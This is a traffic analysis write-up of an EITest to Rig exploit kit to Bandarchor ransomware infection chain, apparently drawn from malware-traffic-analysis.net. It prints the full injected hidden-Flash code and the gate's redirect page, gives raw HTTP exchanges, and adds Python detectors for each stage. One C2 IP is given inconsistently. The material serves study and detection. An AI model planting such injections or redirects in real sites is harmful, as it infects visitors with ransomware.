EITest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

8/31/2016

Source: malware-traffic-analysis.net

The infection chain is as follows:
  • www[.]tdca[.]ca - Compromised site
  • mapobifi[.]xyz - 85.93.0.110 port 80 - EITest gate
  • ew[.]203kcontractorsarkansas[.]com - 109.234.36.220 port 80 - Rig EK
  • 109.236.87.204 - GET /default.jpg - Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 - POST /yyy/fers.php - Post-infection traffic caused by the Bandarchor ransomware
*Analyze the PCAP using the display filter “http.request”
Relevant Additional Analysis:
  1. GET / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. GET HTTP request to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
  3. GET HTTP request to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)
  4. GET HTTP request to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)

  1. Following the TCP stream of the GET request to 207.182.128.162 (length: 523 bytes) reveals the injected Flash object: its movie value and embed source point to hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile with “allowScriptAccess” set to “always”, served from the compromised website hxxp://www[.]tdca[.]ca.
The full injected source code to the compromised website is as follows:
 
 <body> <div style = "position: absolute;z-index:-1; left:282px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="trxoq" codebase="hxxp://fpdownload[.]macromedia[.]com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="50" height="46" align="middle" >
<param name="allowScriptAccess" value="always"/><param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/"/><param name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><param name="wmode" value="opaque"/>
<embed src="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/" quality="high" bgcolor="#ffffff"  name="trxoq" width="43" height="38" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="hxxp://www[.]macromedia[.]com/go/getflashplayer" wmode="opaque"/></object>
</div> </body> 
</body>
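One way to spot this kind of injection when sweeping a site's pages, as an added example that is not part of the original post: a small html.parser walker that flags Flash objects placed inside an invisible (opacity:0) div whose movie is loaded from a host other than the page's own with allowScriptAccess set to always. The sample markup is a constructed, shortened copy of the injection above; the page host and the truncated path are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed, shortened copy of the injection shown above (defanged hxxp:// kept as on the page).
SAMPLE = """<body><div style="position: absolute;z-index:-1; left:282px; opacity:0;">
<object id="trxoq"><param name="allowScriptAccess" value="always"/>
<param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2/"/>
<embed src="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2/" allowScriptAccess="always"/></object></div></body>"""

class HiddenFlashFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.hidden_depth = 0   # >0 while inside a div styled opacity:0 (and its children)
        self.cur = None         # the <object> currently being read, if inside a hidden div
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)         # html.parser lowercases tag and attribute names
        if tag == "div":
            style = (a.get("style") or "").replace(" ", "").lower()
            if self.hidden_depth or re.search(r"opacity:0(?![.\d])", style):
                self.hidden_depth += 1
        elif tag == "object" and self.hidden_depth:
            self.cur = {"src": None, "script_access": None}
        elif self.cur is not None and tag == "param":
            name = (a.get("name") or "").lower()
            if name == "movie":
                self.cur["src"] = a.get("value")
            elif name == "allowscriptaccess":
                self.cur["script_access"] = (a.get("value") or "").lower()
        elif self.cur is not None and tag == "embed":
            self.cur["src"] = self.cur["src"] or a.get("src")
            self.cur["script_access"] = (a.get("allowscriptaccess") or self.cur["script_access"] or "").lower()

    def handle_endtag(self, tag):
        if tag == "div" and self.hidden_depth:
            self.hidden_depth -= 1
        elif tag == "object" and self.cur is not None:
            src = (self.cur["src"] or "").replace("hxxp://", "http://").replace("[.]", ".")  # refang
            host = urlsplit(src).netloc
            if host and host != self.page_host and self.cur["script_access"] == "always":
                self.findings.append((host, self.cur["src"]))
            self.cur = None

def find_hidden_flash(html, page_host):
    # Returns [(flash_host, movie_url)] for script-enabled Flash loads hidden in invisible divs.
    p = HiddenFlashFinder(page_host)
    p.feed(html)
    return p.findings
```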

  2. GET mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile for the Shockwave Flash file, whose body starts with the “CWS” header (a compressed SWF) (referrer: hxxp://tdca[.]ca)
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. The xqt.gif response (821 bytes, Content-Type text/html) redirects the user to 'hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE' using both a meta refresh and a JavaScript document.location.href assignment.
The full source code is as follows:
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="refresh" content="0; url='hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE'">
</head>
<body>
FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB
<script type="text/javascript">
document.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE";
</script>
geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ
</body>
</html>
 
4. GET hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. The same request again, this time for index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET /default.jpg and POST /yyy/fers[.]php to 109.236.87.204 (post-infection traffic from the Bandarchor ransomware)

The full exchange is as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
default
 
POST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache
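To turn the chain above into something a detection engineer can run over extracted HTTP transactions, here is an added example (not from the original post) that tags a request/response pair with the stage it resembles: the cross-site SWF fetch, the meta-refresh/JavaScript handoff, the Rig-style single long query token, and the POST to a bare IP with the non-browser User-Agent. The sample requests are constructed, trimmed copies of the capture; the Rig request headers and the 80-character token threshold are assumptions.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qsl, urlsplit

def parse_request(raw):
    """Split a raw HTTP request into (method, target, {lowercased header: value})."""
    lines = raw.strip().splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # refang the analysts' hxxp://x[.]y notation so urlsplit can parse the value
        headers[name.strip().lower()] = value.strip().replace("hxxp://", "http://").replace("[.]", ".")
    return method, target, headers

def is_bare_ip(host):
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False

def classify(raw, response_body=""):
    """Tag one request (plus the body it got back) with the chain stages it resembles."""
    method, target, h = parse_request(raw)
    host, referer = h.get("host", ""), urlsplit(h.get("referer", "")).netloc
    tags = []
    # Stage 1: Flash player fetching a SWF from a host other than the page it sits on (gate).
    if "x-flash-version" in h and referer and referer != host:
        tags.append("cross-site-flash-load")
    # Stage 2: HTML answer that both meta-refreshes and script-redirects the browser (EK handoff).
    if 'http-equiv="refresh"' in response_body and "document.location.href" in response_body:
        tags.append("gate-redirect")
    # Stage 3: one long base64url-looking query value, the shape of the Rig EK URLs above.
    qs = parse_qsl(urlsplit(target).query)
    if len(qs) == 1 and re.fullmatch(r"[A-Za-z0-9_-]{80,}", qs[0][1]):
        tags.append("ek-style-url")
    # Stage 4: POST straight to a bare IP with a non-browser User-Agent (ransomware check-in).
    if method == "POST" and is_bare_ip(host) and not h.get("user-agent", "").startswith("Mozilla"):
        tags.append("c2-checkin")
    return tags

# Constructed samples trimmed from the capture above; the Rig request headers are assumed.
SWF_REQ = "GET /qdxtqktkb-3eif2/ HTTP/1.1\nReferer: hxxp://www[.]tdca[.]ca/\nx-flash-version: 19,0,0,185\nHost: mapobifi.xyz"
GATE_REQ = "GET /qdxtqktkb-3eif2/xqt.gif HTTP/1.1\nReferer: hxxp://www[.]tdca[.]ca/\nHost: mapobifi.xyz"
GATE_BODY = '<meta http-equiv="refresh" content="0; url=hxxp://ew[.]203kcontractorsarkansas[.]com/">\n<script>document.location.href = "hxxp://ew[.]203kcontractorsarkansas[.]com/";</script>'
RIG_REQ = "GET /?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vH HTTP/1.1\nHost: ew[.]203kcontractorsarkansas[.]com"
C2_REQ = "POST /yyy/fers.php HTTP/1.1\nUser-Agent: post_example\nHost: 109.236.87.204\nContent-Length: 1395"
```

Each constant classifies to exactly one stage, and a plain browser GET with a Mozilla User-Agent to a domain name gets no tag.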